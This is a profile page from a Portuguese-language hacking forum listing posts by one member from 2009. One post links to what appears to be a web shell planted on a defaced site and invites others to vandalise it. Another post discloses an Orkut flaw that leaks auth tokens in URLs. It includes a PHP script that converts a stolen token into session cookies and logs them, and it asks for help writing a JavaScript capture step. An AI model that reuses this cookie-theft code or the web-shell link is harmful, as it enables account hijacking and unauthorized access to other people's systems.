Menu

Show posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Show posts Menu

Messages - Saad

Pages1
#1
Defacement / Re:mundodoshackers.com.br OWNED
18 de December , 2009, 03:48:59 AM
LOOOOOOOL!
#2
Segurança / Re:[Artigo] "Bendito" usuário - Parte 2
13 de December , 2009, 07:44:23 PM
tava esperando tbm, fico muito bom, parabéns [2]
O ruim desses usuarios é a ingenuidade não desconfiar de nada :/
#3
Defacement / Re:mundodoshackers.com.br OWNED
05 de December , 2009, 11:11:41 PM
ah, comédia d+ esses sites kk

"A nossa loja virtual continua online, confira os nossos produtos."

http://www.mundodoshackers.com.br/wp-content/themes/hackers/404.php?seC=edit&filE=index.php&workingdiR=/home/mundodoshackers1/public_html/lojamhos zoa alguem ae :P
#4
Bugs | Exploits | Vulnerabilidades / [ Vul ] Orkut, URL contendo os cookies.
02 de December , 2009, 02:33:09 AM
Bom fussando aqui no orkut na função nova o promova, vi que que na URL contem o auth, no caso os cookies.

URL: http://promote.orkut.com/preview?nt=orkut.com&tt=Darkers&du=Darkers

Quando vc acessar a URL, sera redirecionado para pagina do promova onde contem o auth:

http://promote.orkut.com/oauth_callback/12073179689912925797?pli=1&auth=

Para logar com o auth é simples, http://www.orkut.com/RedirLogin.aspx?auth= é so colocar o auth aqui, porem ele expira muito rapido então podemos transformar ele no cookie usando esse codigo

Code Select
<?
$auth = $_GET[auth];

function curl($url, $header, $nobody, $cookie, $str) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, $header);
curl_setopt($ch, CURLOPT_NOBODY, $nobody);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
$cod = curl_exec($ch); curl_close($ch);
if ($str !== 0) { $cod = explode($str, $cod); }
return $cod;
}
$cookie = curl("http://www.orkut.com/RedirLogin.aspx?auth={$auth}", 1, 1, 0, "Set-Cookie:");
$cookie = $cookie[1];
$fp = fopen("log.txt","a");
fwrite($fp, "$cookie
");
fclose($fp);
?>

tentei fazer um js para capturar o auth e transformar em cookies mas não consegui, o firefox ta bloqueando o Location.href se alguem conseguir posta ae (:
#5
Segurança / Re: [Artigo] "Bendito" usuário - Parte 1
01 de December , 2009, 10:13:46 AM
Fico legal o artigo, parabéns.
Pages1